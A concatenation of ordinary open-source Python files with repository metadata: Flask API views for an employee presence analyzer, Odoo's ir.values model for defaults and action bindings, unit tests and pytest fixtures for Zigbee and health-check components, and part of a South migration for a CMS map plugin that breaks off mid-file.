"""
Users listing for dropdown.
"""
data = get_data()
users = [
{'user_id': i, 'name': data[i]['name']}
for i in data.keys()
]
return sorted(users, key=lambda k: k['name'], cmp=locale.strcoll)
@app.route('/api/v1/months', methods=['GET'])
@jsonify
def months_view():
"""
Years/months listing for dropdown.
"""
return get_dates()
@app.route('/api/v1/top_5/<string:month_year>', methods=['GET'])
@jsonify
def top_5(month_year):
"""
Returns top 5 employees of given month.
"""
try:
year, month = month_year.split('-')
except (IndexError, ValueError):
log.debug('%s is not a correct format!', month_year)
abort(404)
if len(year) < 4 or not year.isdigit() or month not in month_name:
log.debug('%s is not a correct format!', month_year)
abort(404)
data = get_data()
    top_presence = {
user: {
'total_hours': total_hours(data[user]['presence'], month, year),
'image': prepare_photo_url(user).data[1:-1],
'name': data[user]['name']
}
for user in data
}
top5 = list(OrderedDict(
sorted(
top_presence.items(),
key=lambda x: x[1]['total_hours'],
reverse=True
)
).items())[:5]
if not top5[0][1]['total_hours']:
log.debug('No data for year %s', year)
abort(404)
return top5
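# Example request (assuming full English month names, per calendar.month_name):
#   GET /api/v1/top_5/2013-September
# The year part must be at least four digits and the month a full month name,
# otherwise the view aborts with 404.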
@app.route('/api/v1/mean_time_weekday/<int:user_id>', methods=['GET'])
@jsonify
def mean_time_weekday_view(user_id):
"""
Returns mean presence time of given user grouped by weekday.
"""
data = get_data()
if user_id not in data:
log.debug('User %s not found!', user_id)
abort(404)
if not len(data[user_id]['presence']):
return []
weekdays = group_by_weekday(data[user_id]['presence'])
result = [
(day_abbr[weekday], mean(intervals))
for weekday, intervals in enumerate(weekdays)
]
return result
@app.route('/api/v1/presence_weekday/<int:user_id>', methods=['GET'])
@jsonify
def presence_weekday_view(user_id):
"""
Returns total presence time of given user grouped by weekday.
"""
data = get_data()
if user_id not in data:
log.debug('User %s not found!', user_id)
abort(404)
if not len(data[user_id]['presence']):
return []
weekdays = group_by_weekday(data[user_id]['presence'])
result = [
(day_abbr[weekday], sum(intervals))
for weekday, intervals in enumerate(weekdays)
]
result.insert(0, ('Weekday', 'Presence (s)'))
return result
@app.route('/api/v1/presence_start_end/<int:user_id>', methods=['GET'])
@jsonify
def presence_start_end_view(user_id):
"""
Returns daily timespan working hours of given user.
"""
data = get_data()
if user_id not in data:
log.debug('User %s not found!', user_id)
abort(404)
if not len(data[user_id]['presence']):
return {}
start_times, end_times = work_hours(data[user_id]['presence'])
work_days = OrderedDict()
for i in xrange(7): # 7 days a week
work_days[day_abbr[i]] = {
'start_work': int(mean(start_times[i])),
'end_work': int(mean(end_times[i]))
}
return work_days
|
djallberto/presence-analyzer-anowak
|
src/presence_analyzer/views.py
|
Python
|
mit
| 5,040
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import pickle
from openerp import tools
from openerp.osv import osv, fields
from openerp.exceptions import AccessError, MissingError
from openerp.tools.translate import _
EXCLUDED_FIELDS = set((
'report_sxw_content', 'report_rml_content', 'report_sxw', 'report_rml',
'report_sxw_content_data', 'report_rml_content_data', 'search_view', ))
#: Possible slots to bind an action to with :meth:`~.set_action`
ACTION_SLOTS = [
"client_action_multi", # sidebar wizard action
"client_print_multi", # sidebar report printing button
"client_action_relate", # sidebar related link
"tree_but_open", # double-click on item in tree view
"tree_but_action", # deprecated: same as tree_but_open
]
class ir_values(osv.osv):
"""Holds internal model-specific action bindings and user-defined default
       field value definitions. This is a legacy internal model, mixing
two different concepts, and will likely be updated or replaced in a
future version by cleaner, separate models. You should not depend
explicitly on it.
The purpose of each ``ir.values`` entry depends on its type, defined
by the ``key`` column:
* 'default': user-defined default values, used when creating new
records of this model:
* 'action': binding of an action to a particular *action slot* of
this model, making the action easily available in the user
interface for this model.
The ``key2`` column acts as a qualifier, further refining the type
of the entry. The possible values are:
* for 'default' entries: an optional condition restricting the
cases where this particular default value will be applicable,
or ``False`` for no condition
* for 'action' entries: the ``key2`` qualifier is one of the available
action slots, defining how this action can be invoked:
* ``'client_print_multi'`` for report printing actions that will
be available on views displaying items from this model
* ``'client_action_multi'`` for assistants (wizards) actions
that will be available in views displaying objects of this model
* ``'client_action_relate'`` for links towards related documents
that should be available in views displaying objects of this model
* ``'tree_but_open'`` for actions that will be triggered when
double-clicking an item from this model in a hierarchical tree view
Each entry is specific to a model (``model`` column), and for ``'actions'``
type, may even be made specific to a given record of that model when the
``res_id`` column contains a record ID (``False`` means it's global for
all records).
The content of the entry is defined by the ``value`` column, which may either
contain an arbitrary value, or a reference string defining the action that
should be executed.
.. rubric:: Usage: default values
The ``'default'`` entries are usually defined manually by the
users, and set by their UI clients calling :meth:`~.set_default`.
These default values are then automatically used by the
ORM every time a new record is about to be created, i.e. when
:meth:`~openerp.osv.osv.osv.default_get`
or :meth:`~openerp.osv.osv.osv.create` are called.
.. rubric:: Usage: action bindings
Business applications will usually bind their actions during
installation, and OpenERP UI clients will apply them as defined,
based on the list of actions included in the result of
:meth:`~openerp.osv.osv.osv.fields_view_get`,
or directly returned by explicit calls to :meth:`~.get_actions`.
"""
_name = 'ir.values'
def _value_unpickle(self, cursor, user, ids, name, arg, context=None):
res = {}
for record in self.browse(cursor, user, ids, context=context):
value = record[name[:-9]]
if record.key == 'default' and value:
# default values are pickled on the fly
try:
value = str(pickle.loads(value))
except Exception:
pass
res[record.id] = value
return res
def _value_pickle(self, cursor, user, id, name, value, arg, context=None):
if context is None:
context = {}
ctx = context.copy()
if self.CONCURRENCY_CHECK_FIELD in ctx:
del ctx[self.CONCURRENCY_CHECK_FIELD]
record = self.browse(cursor, user, id, context=context)
if record.key == 'default':
# default values are pickled on the fly
value = pickle.dumps(value)
self.write(cursor, user, id, {name[:-9]: value}, context=ctx)
def onchange_object_id(self, cr, uid, ids, object_id, context=None):
if not object_id: return {}
act = self.pool.get('ir.model').browse(cr, uid, object_id, context=context)
return {
'value': {'model': act.model}
}
def onchange_action_id(self, cr, uid, ids, action_id, context=None):
if not action_id: return {}
act = self.pool.get('ir.actions.actions').browse(cr, uid, action_id, context=context)
return {
'value': {'value_unpickle': act.type+','+str(act.id)}
}
_columns = {
'name': fields.char('Name', required=True),
'model': fields.char('Model Name', select=True, required=True,
help="Model to which this entry applies"),
# TODO: model_id and action_id should be read-write function fields
'model_id': fields.many2one('ir.model', 'Model (change only)', size=128,
help="Model to which this entry applies - "
"helper field for setting a model, will "
"automatically set the correct model name"),
'action_id': fields.many2one('ir.actions.actions', 'Action (change only)',
help="Action bound to this entry - "
"helper field for binding an action, will "
"automatically set the correct reference"),
'value': fields.text('Value', help="Default value (pickled) or reference to an action"),
'value_unpickle': fields.function(_value_unpickle, fnct_inv=_value_pickle,
type='text',
string='Default value or action reference'),
'key': fields.selection([('action','Action'),('default','Default')],
'Type', select=True, required=True,
help="- Action: an action attached to one slot of the given model\n"
"- Default: a default value for a model field"),
'key2' : fields.char('Qualifier', select=True,
help="For actions, one of the possible action slots: \n"
" - client_action_multi\n"
" - client_print_multi\n"
" - client_action_relate\n"
" - tree_but_open\n"
"For defaults, an optional condition"
,),
'res_id': fields.integer('Record ID', select=True,
help="Database identifier of the record to which this applies. "
"0 = for all records"),
'user_id': fields.many2one('res.users', 'User', ondelete='cascade', select=True,
help="If set, action binding only applies for this user."),
'company_id': fields.many2one('res.company', 'Company', ondelete='cascade', select=True,
help="If set, action binding only applies for this company")
}
_defaults = {
'key': 'action',
'key2': 'tree_but_open',
}
def _auto_init(self, cr, context=None):
super(ir_values, self)._auto_init(cr, context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'ir_values_key_model_key2_res_id_user_id_idx\'')
if not cr.fetchone():
cr.execute('CREATE INDEX ir_values_key_model_key2_res_id_user_id_idx ON ir_values (key, model, key2, res_id, user_id)')
def create(self, cr, uid, vals, context=None):
res = super(ir_values, self).create(cr, uid, vals, context=context)
self.clear_caches()
return res
def write(self, cr, uid, ids, vals, context=None):
res = super(ir_values, self).write(cr, uid, ids, vals, context=context)
self.clear_caches()
return res
def unlink(self, cr, uid, ids, context=None):
res = super(ir_values, self).unlink(cr, uid, ids, context=context)
self.clear_caches()
return res
def set_default(self, cr, uid, model, field_name, value, for_all_users=True, company_id=False, condition=False):
"""Defines a default value for the given model and field_name. Any previous
default for the same scope (model, field_name, value, for_all_users, company_id, condition)
will be replaced and lost in the process.
Defaults can be later retrieved via :meth:`~.get_defaults`, which will return
the highest priority default for any given field. Defaults that are more specific
have a higher priority, in the following order (highest to lowest):
* specific to user and company
* specific to user only
* specific to company only
* global to everyone
:param string model: model name
:param string field_name: field name to which the default applies
:param value: the default field value to set
:type value: any serializable Python value
:param bool for_all_users: whether the default should apply to everybody or only
the user calling the method
:param int company_id: optional ID of the company to which the default should
apply. If omitted, the default will be global. If True
is passed, the current user's company will be used.
:param string condition: optional condition specification that can be used to
restrict the applicability of the default values
(e.g. based on another field's value). This is an
opaque string as far as the API is concerned, but client
stacks typically use single-field conditions in the
form ``'key=stringified_value'``.
(Currently, the condition is trimmed to 200 characters,
so values that share the same first 200 characters always
match)
:return: id of the newly created ir.values entry
"""
if isinstance(value, unicode):
value = value.encode('utf8')
if company_id is True:
# should be company-specific, need to get company id
user = self.pool.get('res.users').browse(cr, uid, uid)
company_id = user.company_id.id
# remove existing defaults for the same scope
search_criteria = [
('key', '=', 'default'),
('key2', '=', condition and condition[:200]),
('model', '=', model),
('name', '=', field_name),
('user_id', '=', False if for_all_users else uid),
('company_id','=', company_id)
]
self.unlink(cr, uid, self.search(cr, uid, search_criteria))
return self.create(cr, uid, {
'name': field_name,
'value': pickle.dumps(value),
'model': model,
'key': 'default',
'key2': condition and condition[:200],
'user_id': False if for_all_users else uid,
'company_id': company_id,
})
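    # A minimal usage sketch (model, field and value are illustrative, not
    # taken from this file): make 'en_US' the default language on new
    # partners, for the current user only:
    #   ir_values_obj.set_default(cr, uid, 'res.partner', 'lang', 'en_US',
    #                             for_all_users=False)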
def get_default(self, cr, uid, model, field_name, for_all_users=True, company_id=False, condition=False):
""" Return the default value defined for model, field_name, users, company and condition.
Return ``None`` if no such default exists.
"""
search_criteria = [
('key', '=', 'default'),
('key2', '=', condition and condition[:200]),
('model', '=', model),
('name', '=', field_name),
('user_id', '=', False if for_all_users else uid),
('company_id','=', company_id)
]
defaults = self.browse(cr, uid, self.search(cr, uid, search_criteria))
return pickle.loads(defaults[0].value.encode('utf-8')) if defaults else None
def get_defaults(self, cr, uid, model, condition=False):
"""Returns any default values that are defined for the current model and user,
(and match ``condition``, if specified), previously registered via
:meth:`~.set_default`.
Defaults are global to a model, not field-specific, but an optional
``condition`` can be provided to restrict matching default values
to those that were defined for the same condition (usually based
on another field's value).
Default values also have priorities depending on whom they apply
to: only the highest priority value will be returned for any
field. See :meth:`~.set_default` for more details.
:param string model: model name
:param string condition: optional condition specification that can be used to
restrict the applicability of the default values
(e.g. based on another field's value). This is an
opaque string as far as the API is concerned, but client
stacks typically use single-field conditions in the
form ``'key=stringified_value'``.
(Currently, the condition is trimmed to 200 characters,
so values that share the same first 200 characters always
match)
:return: list of default values tuples of the form ``(id, field_name, value)``
(``id`` is the ID of the default entry, usually irrelevant)
"""
# use a direct SQL query for performance reasons,
# this is called very often
query = """SELECT v.id, v.name, v.value FROM ir_values v
LEFT JOIN res_users u ON (v.user_id = u.id)
WHERE v.key = %%s AND v.model = %%s
AND (v.user_id = %%s OR v.user_id IS NULL)
AND (v.company_id IS NULL OR
v.company_id =
(SELECT company_id from res_users where id = %%s)
)
%s
ORDER BY v.user_id, u.company_id"""
params = ('default', model, uid, uid)
if condition:
query %= 'AND v.key2 = %s'
params += (condition[:200],)
else:
query %= 'AND v.key2 is NULL'
cr.execute(query, params)
# keep only the highest priority default for each field
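        # (PostgreSQL sorts NULLs last for ascending order, so user-specific
        # rows come first and setdefault() below keeps them over global ones)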
defaults = {}
for row in cr.dictfetchall():
defaults.setdefault(row['name'],
(row['id'], row['name'], pickle.loads(row['value'].encode('utf-8'))))
return defaults.values()
# use ormcache: this is called a lot by BaseModel.default_get()!
@tools.ormcache('uid', 'model', 'condition')
def get_defaults_dict(self, cr, uid, model, condition=False):
""" Returns a dictionary mapping field names with their corresponding
default value. This method simply improves the returned value of
:meth:`~.get_defaults`.
"""
return dict((f, v) for i, f, v in self.get_defaults(cr, uid, model, condition))
def set_action(self, cr, uid, name, action_slot, model, action, res_id=False):
"""Binds an the given action to the given model's action slot - for later
retrieval via :meth:`~.get_actions`. Any existing binding of the same action
to the same slot is first removed, allowing an update of the action's name.
See the class description for more details about the various action
slots: :class:`~ir_values`.
:param string name: action label, usually displayed by UI client
:param string action_slot: the action slot to which the action should be
bound to - one of ``client_action_multi``,
``client_print_multi``, ``client_action_relate``,
``tree_but_open``.
:param string model: model name
:param string action: action reference, in the form ``'model,id'``
:param int res_id: optional record id - will bind the action only to a
specific record of the model, not all records.
:return: id of the newly created ir.values entry
"""
assert isinstance(action, basestring) and ',' in action, \
'Action definition must be an action reference, e.g. "ir.actions.act_window,42"'
assert action_slot in ACTION_SLOTS, \
'Action slot (%s) must be one of: %r' % (action_slot, ACTION_SLOTS)
# remove existing action definition of same slot and value
search_criteria = [
('key', '=', 'action'),
('key2', '=', action_slot),
('model', '=', model),
('res_id', '=', res_id or 0), # int field -> NULL == 0
('value', '=', action),
]
self.unlink(cr, uid, self.search(cr, uid, search_criteria))
return self.create(cr, uid, {
'key': 'action',
'key2': action_slot,
'model': model,
'res_id': res_id,
'name': name,
'value': action,
})
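    # A minimal usage sketch (the action id 42 is illustrative): bind a window
    # action to the partner sidebar:
    #   ir_values_obj.set_action(cr, uid, 'My action', 'client_action_multi',
    #                            'res.partner', 'ir.actions.act_window,42')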
@tools.ormcache_context('uid', 'action_slot', 'model', 'res_id', keys=('lang',))
def get_actions(self, cr, uid, action_slot, model, res_id=False, context=None):
"""Retrieves the list of actions bound to the given model's action slot.
See the class description for more details about the various action
slots: :class:`~.ir_values`.
:param string action_slot: the action slot to which the actions should be
bound to - one of ``client_action_multi``,
``client_print_multi``, ``client_action_relate``,
``tree_but_open``.
:param string model: model name
:param int res_id: optional record id - will bind the action only to a
specific record of the model, not all records.
:return: list of action tuples of the form ``(id, name, action_def)``,
where ``id`` is the ID of the default entry, ``name`` is the
action label, and ``action_def`` is a dict containing the
action definition as obtained by calling
:meth:`~openerp.osv.osv.osv.read` on the action record.
"""
assert action_slot in ACTION_SLOTS, 'Illegal action slot value: %s' % action_slot
# use a direct SQL query for performance reasons,
# this is called very often
query = """SELECT v.id, v.name, v.value FROM ir_values v
WHERE v.key = %s AND v.key2 = %s
AND v.model = %s
AND (v.res_id = %s
OR v.res_id IS NULL
OR v.res_id = 0)
ORDER BY v.id"""
cr.execute(query, ('action', action_slot, model, res_id or None))
# map values to their corresponding action record
actions = []
for id, name, value in cr.fetchall():
if not value:
continue # skip if undefined
action_model, action_id = value.split(',')
if action_model not in self.pool:
continue # unknown model? skip it!
action = self.pool[action_model].browse(cr, uid, int(action_id), context)
actions.append((id, name, action))
# process values and their action
user = self.pool['res.users'].browse(cr, uid, uid, context)
results = {}
for id, name, action in actions:
fields = [field for field in action._fields if field not in EXCLUDED_FIELDS]
# FIXME: needs cleanup
try:
action_def = {
field: action._fields[field].convert_to_read(action[field])
for field in fields
}
if action._name in ('ir.actions.report.xml', 'ir.actions.act_window'):
if action.groups_id and not action.groups_id & user.groups_id:
if name == 'Menuitem':
raise AccessError(_('You do not have the permission to perform this operation!!!'))
continue
# keep only the last action registered for each action name
results[name] = (id, name, action_def)
except (AccessError, MissingError):
continue
return sorted(results.values())
def _map_legacy_model_list(self, model_list, map_fn, merge_results=False):
"""Apply map_fn to the various models passed, according to
legacy way to specify models/records.
"""
assert isinstance(model_list, (list, tuple)), \
"model_list should be in the form [model,..] or [(model,res_id), ..]"
results = []
for model in model_list:
res_id = False
if isinstance(model, (list, tuple)):
model, res_id = model
result = map_fn(model, res_id)
# some of the functions return one result at a time (tuple or id)
# and some return a list of many of them - care for both
if merge_results:
results.extend(result)
else:
results.append(result)
return results
    # Backwards-compatibility adapter layer to retrofit into split API
def set(self, cr, uid, key, key2, name, models, value, replace=True, isobject=False, meta=False, preserve_user=False, company=False):
"""Deprecated legacy method to set default values and bind actions to models' action slots.
Now dispatches to the newer API methods according to the value of ``key``: :meth:`~.set_default`
(``key=='default'``) or :meth:`~.set_action` (``key == 'action'``).
:deprecated: As of v6.1, ``set_default()`` or ``set_action()`` should be used directly.
"""
assert key in ['default', 'action'], "ir.values entry keys must be in ['default','action']"
if key == 'default':
def do_set(model,res_id):
return self.set_default(cr, uid, model, field_name=name, value=value,
for_all_users=(not preserve_user), company_id=company,
condition=key2)
elif key == 'action':
def do_set(model,res_id):
return self.set_action(cr, uid, name, action_slot=key2, model=model, action=value, res_id=res_id)
return self._map_legacy_model_list(models, do_set)
def get(self, cr, uid, key, key2, models, meta=False, context=None, res_id_req=False, without_user=True, key2_req=True):
"""Deprecated legacy method to get the list of default values or actions bound to models' action slots.
Now dispatches to the newer API methods according to the value of ``key``: :meth:`~.get_defaults`
(``key=='default'``) or :meth:`~.get_actions` (``key == 'action'``)
:deprecated: As of v6.1, ``get_defaults()`` or ``get_actions()`` should be used directly.
"""
assert key in ['default', 'action'], "ir.values entry keys must be in ['default','action']"
if key == 'default':
def do_get(model,res_id):
return self.get_defaults(cr, uid, model, condition=key2)
elif key == 'action':
def do_get(model,res_id):
return self.get_actions(cr, uid, action_slot=key2, model=model, res_id=res_id, context=context)
return self._map_legacy_model_list(models, do_get, merge_results=True)
|
ilexius/odoo
|
openerp/addons/base/ir/ir_values.py
|
Python
|
gpl-3.0
| 25,389
|
import mox
import time
import unittest
from zoom.agent.predicate.health import PredicateHealth
from zoom.common.types import PlatformType
class PredicateHealthTest(unittest.TestCase):
def setUp(self):
self.mox = mox.Mox()
self.interval = 0.1
def tearDown(self):
self.mox.UnsetStubs()
def test_start(self):
pred = PredicateHealth("test", "echo", self.interval, PlatformType.LINUX)
self.mox.StubOutWithMock(pred, "_run")
pred._run().MultipleTimes()
self.mox.ReplayAll()
print "This test should complete quickly"
pred.start()
pred.start() # should noop
pred.start() # should noop
time.sleep(0.25) # give other thread time to check
pred.stop()
self.mox.VerifyAll()
def test_stop(self):
pred = PredicateHealth("test", "echo", self.interval, PlatformType.LINUX)
self.mox.StubOutWithMock(pred, "_run")
pred._run().MultipleTimes()
self.mox.ReplayAll()
pred.start()
time.sleep(0.25) # give other thread time to check
pred.stop()
pred.stop()
pred.stop()
self.mox.VerifyAll()
|
spottradingllc/zoom
|
test/predicate/health_test.py
|
Python
|
gpl-2.0
| 1,195
|
"""Test configuration for the ZHA component."""
from unittest.mock import AsyncMock, MagicMock, PropertyMock, patch
import pytest
import zigpy
from zigpy.application import ControllerApplication
import zigpy.config
import zigpy.group
import zigpy.types
from homeassistant.components.zha import DOMAIN
import homeassistant.components.zha.core.const as zha_const
import homeassistant.components.zha.core.device as zha_core_device
from homeassistant.setup import async_setup_component
from .common import FakeDevice, FakeEndpoint, get_zha_gateway
from tests.common import MockConfigEntry
from tests.components.light.conftest import mock_light_profiles # noqa
FIXTURE_GRP_ID = 0x1001
FIXTURE_GRP_NAME = "fixture group"
@pytest.fixture
def zigpy_app_controller():
"""Zigpy ApplicationController fixture."""
app = MagicMock(spec_set=ControllerApplication)
app.startup = AsyncMock()
app.shutdown = AsyncMock()
groups = zigpy.group.Groups(app)
groups.add_group(FIXTURE_GRP_ID, FIXTURE_GRP_NAME, suppress_event=True)
app.configure_mock(groups=groups)
type(app).ieee = PropertyMock()
app.ieee.return_value = zigpy.types.EUI64.convert("00:15:8d:00:02:32:4f:32")
type(app).nwk = PropertyMock(return_value=zigpy.types.NWK(0x0000))
type(app).devices = PropertyMock(return_value={})
return app
@pytest.fixture(name="config_entry")
async def config_entry_fixture(hass):
"""Fixture representing a config entry."""
entry = MockConfigEntry(
version=2,
domain=zha_const.DOMAIN,
data={
zigpy.config.CONF_DEVICE: {zigpy.config.CONF_DEVICE_PATH: "/dev/ttyUSB0"},
zha_const.CONF_RADIO_TYPE: "ezsp",
},
)
entry.add_to_hass(hass)
return entry
@pytest.fixture
def setup_zha(hass, config_entry, zigpy_app_controller):
"""Set up ZHA component."""
zha_config = {zha_const.CONF_ENABLE_QUIRKS: False}
p1 = patch(
"bellows.zigbee.application.ControllerApplication.new",
return_value=zigpy_app_controller,
)
async def _setup(config=None):
config = config or {}
with p1:
status = await async_setup_component(
hass, zha_const.DOMAIN, {zha_const.DOMAIN: {**zha_config, **config}}
)
assert status is True
await hass.async_block_till_done()
return _setup
@pytest.fixture
def channel():
"""Channel mock factory fixture."""
def channel(name: str, cluster_id: int, endpoint_id: int = 1):
ch = MagicMock()
ch.name = name
ch.generic_id = f"channel_0x{cluster_id:04x}"
ch.id = f"{endpoint_id}:0x{cluster_id:04x}"
ch.async_configure = AsyncMock()
ch.async_initialize = AsyncMock()
return ch
return channel
@pytest.fixture
def zigpy_device_mock(zigpy_app_controller):
"""Make a fake device using the specified cluster classes."""
def _mock_dev(
endpoints,
ieee="00:0d:6f:00:0a:90:69:e7",
manufacturer="FakeManufacturer",
model="FakeModel",
node_descriptor=b"\x02@\x807\x10\x7fd\x00\x00*d\x00\x00",
nwk=0xB79C,
patch_cluster=True,
):
"""Make a fake device using the specified cluster classes."""
device = FakeDevice(
zigpy_app_controller, ieee, manufacturer, model, node_descriptor, nwk=nwk
)
for epid, ep in endpoints.items():
endpoint = FakeEndpoint(manufacturer, model, epid)
endpoint.device = device
device.endpoints[epid] = endpoint
endpoint.device_type = ep["device_type"]
profile_id = ep.get("profile_id")
if profile_id:
endpoint.profile_id = profile_id
for cluster_id in ep.get("in_clusters", []):
endpoint.add_input_cluster(cluster_id, _patch_cluster=patch_cluster)
for cluster_id in ep.get("out_clusters", []):
endpoint.add_output_cluster(cluster_id, _patch_cluster=patch_cluster)
return device
return _mock_dev
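# A minimal usage sketch of the factory above (cluster ids and device_type are
# illustrative):
#   device = zigpy_device_mock(
#       {1: {"in_clusters": [0, 6], "out_clusters": [], "device_type": 0x0100}}
#   )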
@pytest.fixture
def zha_device_joined(hass, setup_zha):
"""Return a newly joined ZHA device."""
async def _zha_device(zigpy_dev):
await setup_zha()
zha_gateway = get_zha_gateway(hass)
await zha_gateway.async_device_initialized(zigpy_dev)
await hass.async_block_till_done()
return zha_gateway.get_device(zigpy_dev.ieee)
return _zha_device
@pytest.fixture
def zha_device_restored(hass, zigpy_app_controller, setup_zha, hass_storage):
"""Return a restored ZHA device."""
async def _zha_device(zigpy_dev, last_seen=None):
zigpy_app_controller.devices[zigpy_dev.ieee] = zigpy_dev
if last_seen is not None:
hass_storage[f"{DOMAIN}.storage"] = {
"key": f"{DOMAIN}.storage",
"version": 1,
"data": {
"devices": [
{
"ieee": str(zigpy_dev.ieee),
"last_seen": last_seen,
"name": f"{zigpy_dev.manufacturer} {zigpy_dev.model}",
}
],
},
}
await setup_zha()
zha_gateway = hass.data[zha_const.DATA_ZHA][zha_const.DATA_ZHA_GATEWAY]
return zha_gateway.get_device(zigpy_dev.ieee)
return _zha_device
@pytest.fixture(params=["zha_device_joined", "zha_device_restored"])
def zha_device_joined_restored(request):
"""Join or restore ZHA device."""
named_method = request.getfixturevalue(request.param)
named_method.name = request.param
return named_method
@pytest.fixture
def zha_device_mock(hass, zigpy_device_mock):
"""Return a zha Device factory."""
def _zha_device(
endpoints=None,
ieee="00:11:22:33:44:55:66:77",
manufacturer="mock manufacturer",
model="mock model",
node_desc=b"\x02@\x807\x10\x7fd\x00\x00*d\x00\x00",
patch_cluster=True,
):
if endpoints is None:
endpoints = {
1: {
"in_clusters": [0, 1, 8, 768],
"out_clusters": [0x19],
"device_type": 0x0105,
},
2: {
"in_clusters": [0],
"out_clusters": [6, 8, 0x19, 768],
"device_type": 0x0810,
},
}
zigpy_device = zigpy_device_mock(
endpoints, ieee, manufacturer, model, node_desc, patch_cluster=patch_cluster
)
zha_device = zha_core_device.ZHADevice(hass, zigpy_device, MagicMock())
return zha_device
return _zha_device
@pytest.fixture
def hass_disable_services(hass):
"""Mock service register."""
with patch.object(hass.services, "async_register"), patch.object(
hass.services, "has_service", return_value=True
):
yield hass
|
turbokongen/home-assistant
|
tests/components/zha/conftest.py
|
Python
|
apache-2.0
| 6,990
|
__author__ = 'takuro'
|
taxpon/pyomni
|
pyomni/object/__init__.py
|
Python
|
mit
| 22
|
from south.db import db
from django.db import models
from cms.plugins.googlemap.models import *
class Migration:
def forwards(self, orm):
# Deleting field 'GoogleMap.public'
db.delete_column('cmsplugin_googlemap', 'public_id')
# Deleting model 'googlemappublic'
db.delete_table('cmsplugin_googlemappublic')
def backwards(self, orm):
# Adding field 'GoogleMap.public'
db.add_column('cmsplugin_googlemap', 'public', orm['googlemap.googlemap:public'])
# Adding model 'googlemappublic'
db.create_table('cmsplugin_googlemappublic', (
('city', orm['googlemap.googlemappublic:city']),
('title', orm['googlemap.googlemappublic:title']),
('mark_delete', orm['googlemap.googlemappublic:mark_delete']),
('zipcode', orm['googlemap.googlemappublic:zipcode']),
('zoom', orm['googlemap.googlemappublic:zoom']),
('content', orm['googlemap.googlemappublic:content']),
('cmspluginpublic_ptr', orm['googlemap.googlemappublic:cmspluginpublic_ptr']),
('address', orm['googlemap.googlemappublic:address']),
))
db.send_create_signal('googlemap', ['googlemappublic'])
models = {
'cms.cmsplugin': {
'creation_date': ('models.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'language': ('models.CharField', [], {'max_length': '5', 'db_index': 'True'}),
'level': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'page': ('models.ForeignKey', [], {'to': "orm['cms.Page']"}),
'parent': ('models.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('models.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'plugin_type': ('models.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('models.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'publisher_is_draft': ('models.BooleanField', [], {'default': '1', 'db_index': 'True', 'blank': 'True'}),
'publisher_public': ('models.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.CMSPlugin']"}),
'publisher_state': ('models.SmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
'rght': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('models.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.cmspluginpublic': {
'creation_date': ('models.DateTimeField', [], {'default': 'datetime.datetime(2009, 7, 14, 7, 37, 26, 118649)'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'language': ('models.CharField', [], {'max_length': '5', 'db_index': 'True'}),
'level': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'mark_delete': ('models.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'page': ('models.ForeignKey', [], {'to': "orm['cms.PagePublic']"}),
'parent': ('models.ForeignKey', [], {'to': "orm['cms.CMSPluginPublic']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('models.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'plugin_type': ('models.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('models.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('models.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.page': {
'changed_by': ('models.CharField', [], {'max_length': '70'}),
'created_by': ('models.CharField', [], {'max_length': '70'}),
'creation_date': ('models.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('models.BooleanField', [], {'default': 'True', 'db_index': 'True', 'blank': 'True'}),
'level': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'login_required': ('models.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'moderator_state': ('models.SmallIntegerField', [], {'default': '1', 'blank': 'True'}),
'navigation_extenders': ('models.CharField', [], {'db_index': 'True', 'max_length': '80', 'null': 'True', 'blank': 'True'}),
'parent': ('models.ForeignKey', [], {'related_name': "'children'", 'blank': 'True', 'null': 'True', 'to': "orm['cms.Page']"}),
'publication_date': ('models.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'publication_end_date': ('models.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'published': ('models.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'publisher_is_draft': ('models.BooleanField', [], {'default': '1', 'db_index': 'True', 'blank': 'True'}),
'publisher_public': ('models.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.Page']"}),
'publisher_state': ('models.SmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
'reverse_id': ('models.CharField', [], {'db_index': 'True', 'max_length': '40', 'null': 'True', 'blank': 'True'}),
'rght': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'site': ('models.ForeignKey', [], {'to': "orm['sites.Site']"}),
'soft_root': ('models.BooleanField', [], {'default': 'False', 'db_index': 'True', 'blank': 'True'}),
'template': ('models.CharField', [], {'max_length': '100'}),
'tree_id': ('models.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.pagepublic': {
'changed_by': ('models.CharField', [], {'max_length': '70'}),
'created_by': ('models.CharField', [], {'max_length': '70'}),
